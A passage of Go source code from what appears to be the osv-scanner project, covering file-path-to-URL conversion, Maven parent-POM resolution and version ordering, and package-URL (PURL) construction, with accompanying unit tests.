workaround item delegate wrapper to stop the selected item from being shown as selected type blurredDelegate struct { list.ItemDelegate } func (d blurredDelegate) Render(w io.Writer, m list.Model, _ int, listItem list.Item) { d.ItemDelegate.Render(w, m, -1, listItem) } ================================================ FILE: internal/url/url.go ================================================ // Copyright 2019 The Go Authors. All rights reserved. // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. // Package url provides functionality for converting file paths to file URLs. // // Code copied from // https://github.com/golang/go/blob/7c2b69080a0b9e35174cc9c93497b6e7176f8275/src/cmd/go/internal/web/url.go // TODO(golang.org/issue/32456): If accepted, move these functions into the // net/url package. package url import ( "errors" "net/url" "path/filepath" "strings" ) var errNotAbsolute = errors.New("path is not absolute") func FromFilePath(path string) (*url.URL, error) { if !filepath.IsAbs(path) { return nil, errNotAbsolute } // If path has a Windows volume name, convert the volume to a host and prefix // per https://blogs.msdn.microsoft.com/ie/2006/12/06/file-uris-in-windows/. if vol := filepath.VolumeName(path); vol != "" { if strings.HasPrefix(vol, `\\`) { path = filepath.ToSlash(path[2:]) i := strings.IndexByte(path, '/') if i < 0 { // A degenerate case. // \\host.example.com (without a share name) // becomes // file://host.example.com/ return &url.URL{ Scheme: "file", Host: path, Path: "/", }, nil } // \\host.example.com\Share\path\to\file // becomes // file://host.example.com/Share/path/to/file return &url.URL{ Scheme: "file", Host: path[:i], Path: filepath.ToSlash(path[i:]), }, nil } // C:\path\to\file // becomes // file:///C:/path/to/file return &url.URL{ Scheme: "file", Path: "/" + filepath.ToSlash(path), }, nil } // /path/to/file // becomes // file:///path/to/file return &url.URL{ Scheme: "file", Path: filepath.ToSlash(path), }, nil } ================================================ FILE: internal/url/url_other_test.go ================================================ // Copyright 2019 The Go Authors. All rights reserved. // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. //go:build !windows package url // Code copied from https://github.com/golang/go/blob/7c2b69080a0b9e35174cc9c93497b6e7176f8275/src/cmd/go/internal/web/url_other_test.go var urlTests = []struct { url string filePath string canonicalURL string // If empty, assume equal to url. wantErr string }{ // Examples from RFC 8089: { url: `file:///path/to/file`, filePath: `/path/to/file`, }, { url: `file:/path/to/file`, filePath: `/path/to/file`, canonicalURL: `file:///path/to/file`, }, { url: `file://localhost/path/to/file`, filePath: `/path/to/file`, canonicalURL: `file:///path/to/file`, }, // We reject non-local files. { url: `file://host.example.com/path/to/file`, wantErr: "file URL specifies non-local host", }, } ================================================ FILE: internal/url/url_test.go ================================================ // Copyright 2019 The Go Authors. All rights reserved. // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. package url import ( "testing" ) // Code copied from https://github.com/golang/go/blob/7c2b69080a0b9e35174cc9c93497b6e7176f8275/src/cmd/go/internal/web/url_test.go func TestURLFromFilePath(t *testing.T) { t.Parallel() for _, tc := range urlTests { if tc.filePath == "" { continue } t.Run(tc.filePath, func(t *testing.T) { t.Parallel() u, err := FromFilePath(tc.filePath) if err != nil { if err.Error() == tc.wantErr { return } if tc.wantErr == "" { t.Fatalf("urlFromFilePath(%v): %v; want ", tc.filePath, err) } else { t.Fatalf("urlFromFilePath(%v): %v; want %s", tc.filePath, err, tc.wantErr) } } if tc.wantErr != "" { t.Fatalf("urlFromFilePath(%v) = ; want error: %s", tc.filePath, tc.wantErr) } wantURL := tc.url if tc.canonicalURL != "" { wantURL = tc.canonicalURL } if u.String() != wantURL { t.Errorf("urlFromFilePath(%v) = %v; want %s", tc.filePath, u, wantURL) } }) } } ================================================ FILE: internal/url/url_windows_test.go ================================================ // Copyright 2019 The Go Authors. All rights reserved. // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. package url // Code copied from https://github.com/golang/go/blob/7c2b69080a0b9e35174cc9c93497b6e7176f8275/src/cmd/go/internal/web/url_windows_test.go var urlTests = []struct { url string filePath string canonicalURL string // If empty, assume equal to url. wantErr string }{ // Examples from https://blogs.msdn.microsoft.com/ie/2006/12/06/file-uris-in-windows/: { url: `file://laptop/My%20Documents/FileSchemeURIs.doc`, filePath: `\\laptop\My Documents\FileSchemeURIs.doc`, }, { url: `file:///C:/Documents%20and%20Settings/davris/FileSchemeURIs.doc`, filePath: `C:\Documents and Settings\davris\FileSchemeURIs.doc`, }, { url: `file:///D:/Program%20Files/Viewer/startup.htm`, filePath: `D:\Program Files\Viewer\startup.htm`, }, { url: `file:///C:/Program%20Files/Music/Web%20Sys/main.html?REQUEST=RADIO`, filePath: `C:\Program Files\Music\Web Sys\main.html`, canonicalURL: `file:///C:/Program%20Files/Music/Web%20Sys/main.html`, }, { url: `file://applib/products/a-b/abc_9/4148.920a/media/start.swf`, filePath: `\\applib\products\a-b\abc_9\4148.920a\media\start.swf`, }, { url: `file:////applib/products/a%2Db/abc%5F9/4148.920a/media/start.swf`, wantErr: "file URL missing drive letter", }, { url: `C:\Program Files\Music\Web Sys\main.html?REQUEST=RADIO`, wantErr: "non-file URL", }, // The example "file://D:\Program Files\Viewer\startup.htm" errors out in // url.Parse, so we substitute a slash-based path for testing instead. { url: `file://D:/Program Files/Viewer/startup.htm`, wantErr: "file URL encodes volume in host field: too few slashes?", }, // The blog post discourages the use of non-ASCII characters because they // depend on the user's current codepage. However, when we are working with Go // strings we assume UTF-8 encoding, and our url package refuses to encode // URLs to non-ASCII strings. { url: `file:///C:/exampleㄓ.txt`, filePath: `C:\exampleㄓ.txt`, canonicalURL: `file:///C:/example%E3%84%93.txt`, }, { url: `file:///C:/example%E3%84%93.txt`, filePath: `C:\exampleㄓ.txt`, }, // Examples from RFC 8089: // We allow the drive-letter variation from section E.2, because it is // simpler to support than not to. However, we do not generate the shorter // form in the reverse direction. { url: `file:c:/path/to/file`, filePath: `c:\path\to\file`, canonicalURL: `file:///c:/path/to/file`, }, // We encode the UNC share name as the authority following section E.3.1, // because that is what the Microsoft blog post explicitly recommends. { url: `file://host.example.com/Share/path/to/file.txt`, filePath: `\\host.example.com\Share\path\to\file.txt`, }, // We decline the four- and five-slash variations from section E.3.2. // The paths in these URLs would change meaning under path.Clean. { url: `file:////host.example.com/path/to/file`, wantErr: "file URL missing drive letter", }, { url: `file://///host.example.com/path/to/file`, wantErr: "file URL missing drive letter", }, } ================================================ FILE: internal/utility/depgroup/devgroup.go ================================================ // Package depgroups provides functionality for working with dependency groups. package depgroups import ( "slices" "github.com/ossf/osv-schema/bindings/go/osvconstants" ) // IsDevGroup returns if any string in groups indicates the development dependency group for the specified ecosystem. func IsDevGroup(sys osvconstants.Ecosystem, groups []string) bool { var dev string switch sys { case osvconstants.EcosystemPackagist, osvconstants.EcosystemNPM, osvconstants.EcosystemPyPI, osvconstants.EcosystemPub: dev = "dev" case osvconstants.EcosystemConanCenter: dev = "build-requires" case osvconstants.EcosystemMaven: dev = "test" default: // We are not able to report development dependencies for these ecosystems. return false } return slices.Contains(groups, dev) } ================================================ FILE: internal/utility/maven/maven.go ================================================ // Package maven provides utility functions for working with Maven projects. package maven import ( "context" "errors" "fmt" "os" "path/filepath" "strings" "deps.dev/util/maven" "deps.dev/util/resolve" "deps.dev/util/semver" "github.com/google/osv-scanner/v2/internal/datasource" ) const ( OriginManagement = "management" OriginParent = "parent" OriginPlugin = "plugin" OriginProfile = "profile" ) // MaxParent sets a limit on the number of parents to avoid indefinite loop. const MaxParent = 100 // MergeParents parses local accessible parent pom.xml or fetches it from // upstream, merges into root project, then interpolate the properties. // result holds the merged Maven project. // current holds the current parent project to merge. // start indicates the index of the current parent project, which is used to // check if the packaging has to be `pom`. // allowLocal indicates whether parsing local parent pom.xml is allowed. // path holds the path to the current pom.xml, which is used to compute the // relative path of parent. func MergeParents(ctx context.Context, mavenClient *datasource.MavenRegistryAPIClient, result *maven.Project, current maven.Parent, start int, path string, allowLocal bool) error { currentPath := path visited := make(map[maven.ProjectKey]bool, MaxParent) for n := start; n < MaxParent; n++ { if current.GroupID == "" || current.ArtifactID == "" || current.Version == "" { break } if visited[current.ProjectKey] { // A cycle of parents is detected return errors.New("a cycle of parents is detected") } visited[current.ProjectKey] = true var proj maven.Project parentFound := false if allowLocal { if parentPath := ParentPOMPath(currentPath, string(current.RelativePath)); parentPath != "" { currentPath = parentPath f, err := os.Open(parentPath) if err != nil { return fmt.Errorf("failed to open parent file %s: %w", parentPath, err) } err = datasource.NewMavenDecoder(f).Decode(&proj) f.Close() if err != nil { return fmt.Errorf("failed to unmarshal project: %w", err) } if ProjectKey(proj) == current.ProjectKey && proj.Packaging == "pom" { // Only mark parent is found when the identifiers and packaging are exptected. parentFound = true } } } if !parentFound { // Once we fetch a parent pom.xml from upstream, we should not // allow parsing parent pom.xml locally anymore. allowLocal = false var err error if proj, err = mavenClient.GetProject(ctx, string(current.GroupID), string(current.ArtifactID), string(current.Version)); err != nil { return fmt.Errorf("failed to get Maven project %s:%s:%s: %w", current.GroupID, current.ArtifactID, current.Version, err) } if n > 0 && proj.Packaging != "pom" { // A parent project should only be of "pom" packaging type. return fmt.Errorf("invalid packaging for parent project %s", proj.Packaging) } if ProjectKey(proj) != current.ProjectKey { // The identifiers in parent does not match what we want. return fmt.Errorf("parent identifiers mismatch: %v, expect %v", proj.ProjectKey, current.ProjectKey) } } // Empty JDK and ActivationOS indicates merging the default profiles. if err := result.MergeProfiles("", maven.ActivationOS{}); err != nil { return fmt.Errorf("failed to merge profiles: %w", err) } for _, repo := range proj.Repositories { if err := mavenClient.AddRegistry(datasource.MavenRegistry{ URL: string(repo.URL), ID: string(repo.ID), ReleasesEnabled: repo.Releases.Enabled.Boolean(), SnapshotsEnabled: repo.Snapshots.Enabled.Boolean(), }); err != nil { return fmt.Errorf("failed to add registry %s: %w", repo.URL, err) } } result.MergeParent(proj) current = proj.Parent } // Interpolate the project to resolve the properties. return result.Interpolate() } // ProjectKey returns a project key with empty groupId/version // filled by corresponding fields in parent. func ProjectKey(proj maven.Project) maven.ProjectKey { if proj.GroupID == "" { proj.GroupID = proj.Parent.GroupID } if proj.Version == "" { proj.Version = proj.Parent.Version } return proj.ProjectKey } // ParentPOMPath resolves the path to the parent POM in the same manner as Maven. // // That is, it first looks for the parent POM in the 'relativePath' directory, // then in the parent directory, and finally in the remote repository. func ParentPOMPath(currentPath, relativePath string) string { if relativePath == "" { relativePath = "../pom.xml" } path := filepath.Join(filepath.Dir(currentPath), relativePath) if info, err := os.Stat(path); err == nil { if !info.IsDir() { return path } // Current path is a directory, so look for pom.xml in the directory. path = filepath.Join(path, "pom.xml") if _, err := os.Stat(path); err == nil { return path } } return "" } // GetDependencyManagement returns managed dependencies in the specified Maven project by fetching remote pom.xml. func GetDependencyManagement(ctx context.Context, client *datasource.MavenRegistryAPIClient, groupID, artifactID, version maven.String) (maven.DependencyManagement, error) { root := maven.Parent{ProjectKey: maven.ProjectKey{GroupID: groupID, ArtifactID: artifactID, Version: version}} var result maven.Project // To get dependency management from another project, we need the // project with parents merged, so we call MergeParents by passing // an empty project. if err := MergeParents(ctx, client.WithoutRegistries(), &result, root, 0, "", false); err != nil { return maven.DependencyManagement{}, err } return result.DependencyManagement, nil } // CompareVersions compares two Maven semver versions with special behaviour for specific packages, // producing more desirable ordering using non-standard comparison. func CompareVersions(vk resolve.VersionKey, a *semver.Version, b *semver.Version) int { if a == nil || b == nil { if a == nil { return -1 } return 1 } if vk.Name == "com.google.guava:guava" { // com.google.guava:guava has 'flavors' with versions ending with -jre or -android. // https://github.com/google/guava/wiki/ReleasePolicy#flavors // To preserve the flavor in updates, we make the opposite flavor considered the earliest versions. // Old versions have '22.0' and '22.0-android', and even older version don't have any flavors. // Only check for the android flavor, and assume its jre otherwise. wantAndroid := strings.HasSuffix(vk.Version, "-android") aIsAndroid := strings.HasSuffix(a.String(), "-android") bIsAndroid := strings.HasSuffix(b.String(), "-android") if aIsAndroid == bIsAndroid { return a.Compare(b) } if aIsAndroid == wantAndroid { return 1 } return -1 } // Old versions of apache commons-* libraries (commons-io:commons-io, commons-math:commons-math, etc.) // used date-based versions (e.g. 20040118.003354), which naturally sort after the more recent semver versions. // We manually force the date versions to come before the others to prevent downgrades. if strings.HasPrefix(vk.Name, "commons-") { // All date-based versions of these packages seem to be in the years 2002-2005. // It's extremely unlikely we'd see any versions dated before 1999 or after 2010. // It's also unlikely we'd see any major versions of these packages reach up to 200.0.0. // Checking if the version starts with "200" should therefore be sufficient to determine if it's a year. aCal := strings.HasPrefix(a.String(), "200") bCal := strings.HasPrefix(b.String(), "200") if aCal == bCal { return a.Compare(b) } if aCal { return -1 } return 1 } return a.Compare(b) } ================================================ FILE: internal/utility/maven/maven_test.go ================================================ package maven_test import ( "path/filepath" "testing" "deps.dev/util/resolve" "deps.dev/util/semver" "github.com/google/osv-scanner/v2/internal/utility/maven" ) func TestParentPOMPath(t *testing.T) { t.Parallel() tests := []struct { currentPath, relativePath string want string }{ // testdata // |- maven // | |- my-app // | | |- pom.xml // | |- parent // | | |- pom.xml // |- pom.xml { // Parent path is specified correctly. currentPath: filepath.Join("testdata", "my-app", "pom.xml"), relativePath: "../parent/pom.xml", want: filepath.Join("testdata", "parent", "pom.xml"), }, { // Wrong file name is specified in relative path. currentPath: filepath.Join("testdata", "my-app", "pom.xml"), relativePath: "../parent/abc.xml", want: "", }, { // Wrong directory is specified in relative path. currentPath: filepath.Join("testdata", "my-app", "pom.xml"), relativePath: "../not-found/pom.xml", want: "", }, { // Only directory is specified. currentPath: filepath.Join("testdata", "my-app", "pom.xml"), relativePath: "../parent", want: filepath.Join("testdata", "parent", "pom.xml"), }, { // Parent relative path is default to '../pom.xml'. currentPath: filepath.Join("testdata", "my-app", "pom.xml"), relativePath: "", want: filepath.Join("testdata", "pom.xml"), }, { // No pom.xml is found even in the default path. currentPath: filepath.Join("testdata", "pom.xml"), relativePath: "", want: "", }, } for _, tt := range tests { got := maven.ParentPOMPath(tt.currentPath, tt.relativePath) if got != tt.want { t.Errorf("ParentPOMPath(%s, %s): got %s, want %s", tt.currentPath, tt.relativePath, got, tt.want) } } } func TestCompareVersions(t *testing.T) { t.Parallel() versionKey := func(name string, version string) resolve.VersionKey { return resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: name, }, Version: version, } } semVer := func(version string) *semver.Version { parsed, _ := resolve.Maven.Semver().Parse(version) return parsed } tests := []struct { vk resolve.VersionKey a, b *semver.Version want int }{ { versionKey("abc:xyz", "1.0.0"), semVer("1.2.3"), semVer("1.2.3"), 0, }, { versionKey("abc:xyz", "1.0.0"), semVer("1.2.3"), semVer("2.3.4"), -1, }, { versionKey("com.google.guava:guava", "1.0.0"), semVer("1.2.3"), semVer("2.3.4"), -1, }, { versionKey("com.google.guava:guava", "1.0.0"), semVer("1.2.3-jre"), semVer("2.3.4-jre"), -1, }, { versionKey("com.google.guava:guava", "1.0.0"), semVer("1.2.3-android"), semVer("2.3.4-android"), -1, }, { versionKey("com.google.guava:guava", "1.0.0"), semVer("2.3.4-android"), semVer("1.2.3-jre"), -1, }, { versionKey("com.google.guava:guava", "1.0.0-jre"), semVer("1.2.3-android"), semVer("1.2.3-jre"), -1, }, { versionKey("com.google.guava:guava", "1.0.0-android"), semVer("1.2.3-android"), semVer("1.2.3-jre"), 1, }, { versionKey("commons-io:commons-io", "1.0.0"), semVer("1.2.3"), semVer("2.3.4"), -1, }, { versionKey("commons-io:commons-io", "1.0.0"), semVer("1.2.3"), semVer("20010101.000000"), 1, }, } for _, tt := range tests { got := maven.CompareVersions(tt.vk, tt.a, tt.b) if got != tt.want { t.Errorf("CompareVersions(%v, %v, %v): got %b, want %b", tt.vk, tt.a, tt.b, got, tt.want) } } } ================================================ FILE: internal/utility/maven/testdata/my-app/pom.xml ================================================ org.test my-app 1.0.0 ================================================ FILE: internal/utility/maven/testdata/parent/pom.xml ================================================ org.test parent-pom 1.0.0 ================================================ FILE: internal/utility/maven/testdata/pom.xml ================================================ org.test test 1.0.0 ================================================ FILE: internal/utility/purl/composer.go ================================================ package purl import ( "fmt" "strings" "github.com/google/osv-scanner/v2/pkg/models" ) func FromComposer(packageInfo models.PackageInfo) (namespace string, name string, err error) { nameParts := strings.Split(packageInfo.Name, "/") if len(nameParts) != 2 { err = fmt.Errorf("invalid packagist package_name (%s)", packageInfo.Name) return } namespace = nameParts[0] name = nameParts[1] return } ================================================ FILE: internal/utility/purl/composer_test.go ================================================ package purl_test import ( "testing" "github.com/google/osv-scanner/v2/internal/utility/purl" "github.com/google/osv-scanner/v2/pkg/models" "github.com/ossf/osv-schema/bindings/go/osvconstants" ) func TestComposerExtraction_shouldExtractPackages(t *testing.T) { t.Parallel() testCase := struct { packageInfo models.PackageInfo expectedNamespace string expectedName string }{ packageInfo: models.PackageInfo{ Name: "symfony/yaml", Version: "7.0.0", Ecosystem: string(osvconstants.EcosystemPackagist), Commit: "", }, expectedNamespace: "symfony", expectedName: "yaml", } namespace, name, err := purl.FromComposer(testCase.packageInfo) if err != nil { t.Errorf("Extraction didn't succeed, package has been wrongfully filtered") } if namespace != testCase.expectedNamespace { t.Errorf("got %s; want %s", namespace, testCase.expectedNamespace) } if name != testCase.expectedName { t.Errorf("got %s; want %s", name, testCase.expectedName) } } func TestComposerExtraction_shouldFilterPackages(t *testing.T) { t.Parallel() testCases := []struct { name string packageInfo models.PackageInfo }{ { name: "when_package_contains_less_than_2_parts", packageInfo: models.PackageInfo{ Name: "symfony", Version: "7.0.0", Ecosystem: string(osvconstants.EcosystemPackagist), Commit: "", }, }, { name: "when_package_have_no_name", packageInfo: models.PackageInfo{ Name: "", Version: "7.0.0", Ecosystem: string(osvconstants.EcosystemPackagist), Commit: "", }, }, } for _, test := range testCases { testCase := test t.Run(testCase.name, func(t *testing.T) { t.Parallel() _, _, err := purl.FromComposer(testCase.packageInfo) if err == nil { t.Errorf("Package %v should have been filtered\n", testCase.packageInfo) } }) } } ================================================ FILE: internal/utility/purl/golang.go ================================================ package purl import ( "fmt" "strings" "github.com/google/osv-scanner/v2/pkg/models" ) func FromGo(packageInfo models.PackageInfo) (namespace string, name string, err error) { nameParts := strings.Split(packageInfo.Name, "/") if len(nameParts) == 0 || len(packageInfo.Name) == 0 { err = fmt.Errorf("invalid golang package_name (%s)", packageInfo.Name) return } if len(nameParts) > 1 { namespace = strings.Join(nameParts[:len(nameParts)-1], "/") } name = nameParts[len(nameParts)-1] return } ================================================ FILE: internal/utility/purl/golang_test.go ================================================ package purl_test import ( "testing" "github.com/google/osv-scanner/v2/internal/utility/purl" "github.com/google/osv-scanner/v2/pkg/models" "github.com/ossf/osv-schema/bindings/go/osvconstants" ) func TestGolangExtraction_shouldExtractPackages(t *testing.T) { t.Parallel() testCases := []struct { name string packageInfo models.PackageInfo expectedNamespace string expectedName string }{ { name: "when_package_comes_from_go_registry", packageInfo: models.PackageInfo{ Name: "golang.org/x/mod", Version: "v0.14.0", Ecosystem: string(osvconstants.EcosystemGo), Commit: "", }, expectedNamespace: "golang.org/x", expectedName: "mod", }, { name: "when_package_comes_from_github", packageInfo: models.PackageInfo{ Name: "github.com/urfave/cli/v2", Version: "v2.26.0", Ecosystem: string(osvconstants.EcosystemGo), Commit: "", }, expectedNamespace: "github.com/urfave/cli", expectedName: "v2", }, { name: "when_package_uses_a_domain", packageInfo: models.PackageInfo{ Name: "go.opencensus.io", Version: "v0.24.0", Ecosystem: string(osvconstants.EcosystemGo), Commit: "", }, expectedNamespace: "", expectedName: "go.opencensus.io", }, } for _, test := range testCases { testCase := test t.Run(testCase.name, func(t *testing.T) { t.Parallel() namespace, name, err := purl.FromGo(testCase.packageInfo) if err != nil { t.Errorf("Extraction didn't succeed, package has been wrongfully filtered") } if namespace != testCase.expectedNamespace { t.Errorf("got %s; want %s", namespace, testCase.expectedNamespace) } if name != testCase.expectedName { t.Errorf("got %s; want %s", name, testCase.expectedName) } }) } } func TestGolangExtraction_shouldFilterPackages(t *testing.T) { t.Parallel() testCases := []struct { name string packageInfo models.PackageInfo }{ { name: "when_package_have_no_name", packageInfo: models.PackageInfo{ Name: "", Version: "v2.26.0", Ecosystem: string(osvconstants.EcosystemGo), Commit: "", }, }, } for _, test := range testCases { testCase := test t.Run(testCase.name, func(t *testing.T) { t.Parallel() _, _, err := purl.FromGo(testCase.packageInfo) if err == nil { t.Errorf("Package %v should have been filtered\n", testCase.packageInfo) } }) } } ================================================ FILE: internal/utility/purl/maven.go ================================================ package purl import ( "fmt" "strings" "github.com/google/osv-scanner/v2/pkg/models" ) func FromMaven(packageInfo models.PackageInfo) (namespace string, name string, err error) { nameParts := strings.Split(packageInfo.Name, ":") if len(nameParts) != 2 { err = fmt.Errorf("invalid maven package_name(%s)", packageInfo.Name) return } namespace = nameParts[0] name = nameParts[1] return } ================================================ FILE: internal/utility/purl/maven_test.go ================================================ package purl_test import ( "testing" "github.com/google/osv-scanner/v2/internal/utility/purl" "github.com/google/osv-scanner/v2/pkg/models" "github.com/ossf/osv-schema/bindings/go/osvconstants" ) func TestMavenExtraction_shouldExtractPackages(t *testing.T) { t.Parallel() testCase := struct { packageInfo models.PackageInfo expectedNamespace string expectedName string }{ packageInfo: models.PackageInfo{ Name: "log4j:log4j-core", Version: "1.2.17", Ecosystem: string(osvconstants.EcosystemMaven), Commit: "", }, expectedNamespace: "log4j", expectedName: "log4j-core", } namespace, name, err := purl.FromMaven(testCase.packageInfo) if err != nil { t.Errorf("Extraction didn't succeed, package has been wrongfully filtered") } if namespace != testCase.expectedNamespace { t.Errorf("got %s; want %s", namespace, testCase.expectedNamespace) } if name != testCase.expectedName { t.Errorf("got %s; want %s", name, testCase.expectedName) } } func TestMavenExtraction_shouldFilterPackages(t *testing.T) { t.Parallel() testCases := []struct { name string packageInfo models.PackageInfo }{ { name: "when_package_contains_less_than_2_parts", packageInfo: models.PackageInfo{ Name: "log4j", Version: "1.2.17", Ecosystem: string(osvconstants.EcosystemMaven), Commit: "", }, }, { name: "when_package_have_no_name", packageInfo: models.PackageInfo{ Name: "", Version: "1.2.17", Ecosystem: string(osvconstants.EcosystemMaven), Commit: "", }, }, } for _, test := range testCases { testCase := test t.Run(testCase.name, func(t *testing.T) { t.Parallel() _, _, err := purl.FromMaven(testCase.packageInfo) if err == nil { t.Errorf("Package %v should have been filtered\n", testCase.packageInfo) } }) } } ================================================ FILE: internal/utility/purl/package_grouper.go ================================================ package purl import ( "slices" "github.com/google/osv-scanner/v2/pkg/models" ) // Group takes a list of packages, and group them in a map using their PURL // as key It is a way to have only one instance of each package, even if some has // been detected multiple times. If the function fails to create a PURL from a // package, it generates an error, continue to group the other packages and // reports both grouped packages and all generated errors. func Group(packageSources []models.PackageSource) (map[string]models.PackageVulns, []error) { uniquePackages := make(map[string]models.PackageVulns) errors := make([]error, 0) for _, packageSource := range packageSources { for _, pkg := range packageSource.Packages { packageURL, err := FromPackage(pkg.Package) if err != nil { errors = append(errors, err) continue } packageVulns, packageExists := uniquePackages[packageURL.ToString()] if packageExists { // Entry already exists, we need to merge slices which are not expected to be the exact same packageVulns.DepGroups = append(packageVulns.DepGroups, pkg.DepGroups...) uniquePackages[packageURL.ToString()] = packageVulns } else { // Entry does not exist yet, lets create it newPackageVuln := models.PackageVulns{ Package: models.PackageInfo{ Name: pkg.Package.Name, Version: pkg.Package.Version, Ecosystem: pkg.Package.Ecosystem, Deprecated: pkg.Package.Deprecated, }, DepGroups: slices.Clone(pkg.DepGroups), Vulnerabilities: slices.Clone(pkg.Vulnerabilities), Groups: slices.Clone(pkg.Groups), Licenses: slices.Clone(pkg.Licenses), LicenseViolations: slices.Clone(pkg.LicenseViolations), } uniquePackages[packageURL.ToString()] = newPackageVuln } } } return uniquePackages, errors } ================================================ FILE: internal/utility/purl/package_grouper_test.go ================================================ package purl_test import ( "reflect" "testing" "github.com/google/osv-scanner/v2/internal/utility/purl" "github.com/google/osv-scanner/v2/pkg/models" "github.com/ossf/osv-schema/bindings/go/osvconstants" "github.com/ossf/osv-schema/bindings/go/osvschema" ) func TestGroupPackageByPURL_ShouldUnifyPackages(t *testing.T) { t.Parallel() input := []models.PackageSource{ { Source: models.SourceInfo{ Path: "/dir/lockfile.xml", Type: "", }, Packages: []models.PackageVulns{ { Package: models.PackageInfo{ Name: "foo.bar:the-first-package", Version: "1.0.0", Ecosystem: string(osvconstants.EcosystemMaven), }, Vulnerabilities: []*osvschema.Vulnerability{ {Id: "GHSA-456"}, }, Groups: []models.GroupInfo{ { IDs: []string{"GHSA-456"}, Aliases: []string{"GHSA-456"}, }, }, DepGroups: []string{"build"}, }, { Package: models.PackageInfo{ Name: "foo.bar:the-first-package", Version: "1.0.0", Ecosystem: string(osvconstants.EcosystemMaven), }, Vulnerabilities: []*osvschema.Vulnerability{ {Id: "GHSA-456"}, }, Groups: []models.GroupInfo{ { IDs: []string{"GHSA-456"}, Aliases: []string{"GHSA-456"}, }, }, }, { Package: models.PackageInfo{ Name: "foo.bar:the-first-package", Version: "1.0.0", Ecosystem: string(osvconstants.EcosystemMaven), }, Vulnerabilities: []*osvschema.Vulnerability{ {Id: "GHSA-456"}, }, Groups: []models.GroupInfo{ { IDs: []string{"GHSA-456"}, Aliases: []string{"GHSA-456"}, }, }, }, { Package: models.PackageInfo{ Name: "foo.bar:package-2", Ecosystem: string(osvconstants.EcosystemMaven), Version: "1.0.0", }, }, }, }, { Source: models.SourceInfo{ Path: "/dir2/lockfile.json", Type: "", }, Packages: []models.PackageVulns{ { Package: models.PackageInfo{ Name: "foo.bar:the-first-package", Version: "1.0.0", Ecosystem: string(osvconstants.EcosystemMaven), }, Vulnerabilities: []*osvschema.Vulnerability{ {Id: "GHSA-456"}, }, Groups: []models.GroupInfo{ { IDs: []string{"GHSA-456"}, Aliases: []string{"GHSA-456"}, }, }, DepGroups: []string{"test"}, }, { Package: models.PackageInfo{ Name: "foo.bar:package-2", Ecosystem: string(osvconstants.EcosystemMaven), Version: "1.0.0", }, }, }, }, } result, errors := purl.Group(input) expected := map[string]models.PackageVulns{ "pkg:maven/foo.bar/the-first-package@1.0.0": { Package: models.PackageInfo{ Name: "foo.bar:the-first-package", Version: "1.0.0", Ecosystem: string(osvconstants.EcosystemMaven), }, Vulnerabilities: []*osvschema.Vulnerability{ {Id: "GHSA-456"}, }, Groups: []models.GroupInfo{ { IDs: []string{"GHSA-456"}, Aliases: []string{"GHSA-456"}, }, }, DepGroups: []string{"build", "test"}, }, "pkg:maven/foo.bar/package-2@1.0.0": { Package: models.PackageInfo{ Name: "foo.bar:package-2", Version: "1.0.0", Ecosystem: string(osvconstants.EcosystemMaven), }, }, } if len(errors) > 0 { t.Errorf("Unexpected errors: %v", errors) } if len(result) != len(expected) { t.Errorf("Expected %d packages, got %d", len(expected), len(result)) } for expectedPURL, expectedInfo := range expected { info, exists := result[expectedPURL] if !exists { t.Errorf("Expected package %s to be in the results", expectedPURL) } if !reflect.DeepEqual(info, expectedInfo) { t.Errorf("Expected package %s to be %v, got %v", expectedPURL, expectedInfo, info) } } } ================================================ FILE: internal/utility/purl/purl.go ================================================ // Package purl provides functionality for working with PURLs. package purl import ( "fmt" "github.com/google/osv-scalibr/inventory/osvecosystem" "github.com/google/osv-scanner/v2/pkg/models" "github.com/ossf/osv-schema/bindings/go/osvconstants" "github.com/package-url/packageurl-go" ) type ParameterExtractor func(packageInfo models.PackageInfo) (namespace string, name string, err error) var EcosystemToPURLMapper = map[osvconstants.Ecosystem]string{ osvconstants.EcosystemMaven: packageurl.TypeMaven, osvconstants.EcosystemGo: packageurl.TypeGolang, osvconstants.EcosystemPackagist: packageurl.TypeComposer, osvconstants.EcosystemPyPI: packageurl.TypePyPi, osvconstants.EcosystemRubyGems: packageurl.TypeGem, osvconstants.EcosystemNuGet: packageurl.TypeNuget, osvconstants.EcosystemNPM: packageurl.TypeNPM, osvconstants.EcosystemConanCenter: packageurl.TypeConan, osvconstants.EcosystemCratesIO: packageurl.TypeCargo, osvconstants.EcosystemPub: packageurl.TypePub, osvconstants.EcosystemHex: packageurl.TypeHex, osvconstants.EcosystemCRAN: packageurl.TypeCran, } var ecosystemPURLExtractor = map[osvconstants.Ecosystem]ParameterExtractor{ osvconstants.EcosystemMaven: FromMaven, osvconstants.EcosystemGo: FromGo, osvconstants.EcosystemPackagist: FromComposer, } func FromPackage(packageInfo models.PackageInfo) (*packageurl.PackageURL, error) { var namespace string var name string version := packageInfo.Version eco, err := osvecosystem.Parse(packageInfo.Ecosystem) if err != nil { return nil, err } purlType, typeExists := EcosystemToPURLMapper[eco.Ecosystem] parameterExtractor, extractorExists := ecosystemPURLExtractor[eco.Ecosystem] if !typeExists { return nil, fmt.Errorf("unable to determine purl type of %s@%s (%s)", packageInfo.Name, packageInfo.Version, packageInfo.Ecosystem) } if extractorExists { var err error namespace, name, err = parameterExtractor(packageInfo) if err != nil { return nil, err } } else { name = packageInfo.Name } return packageurl.NewPackageURL(purlType, namespace, name, version, nil, ""), nil } ================================================ FILE: internal/utility/purl/purl_to_package.go ================================================ package purl import ( "github.com/google/osv-scanner/v2/pkg/models" "github.com/ossf/osv-schema/bindings/go/osvconstants" "github.com/package-url/packageurl-go" ) // used like so: purlEcosystems[PkgURL.Type][PkgURL.Namespace] // * means it should match any namespace string var purlEcosystems = map[string]map[string]osvconstants.Ecosystem{ "apk": {"alpine": osvconstants.EcosystemAlpine}, "cargo": {"*": osvconstants.EcosystemCratesIO}, "composer": {"*": osvconstants.EcosystemPackagist}, "conan": {"*": osvconstants.EcosystemConanCenter}, "cran": {"*": osvconstants.EcosystemCRAN}, "deb": { "debian": osvconstants.EcosystemDebian, "ubuntu": osvconstants.EcosystemUbuntu, }, "gem": {"*": osvconstants.EcosystemRubyGems}, // We don't yet have a GIT ecosystem which aligns with the generic type better. // "generic": {"*": osvconstants.EcosystemOSSFuzz}, "github": {"*": osvconstants.EcosystemGitHubActions}, "golang": {"*": osvconstants.EcosystemGo}, "hackage": 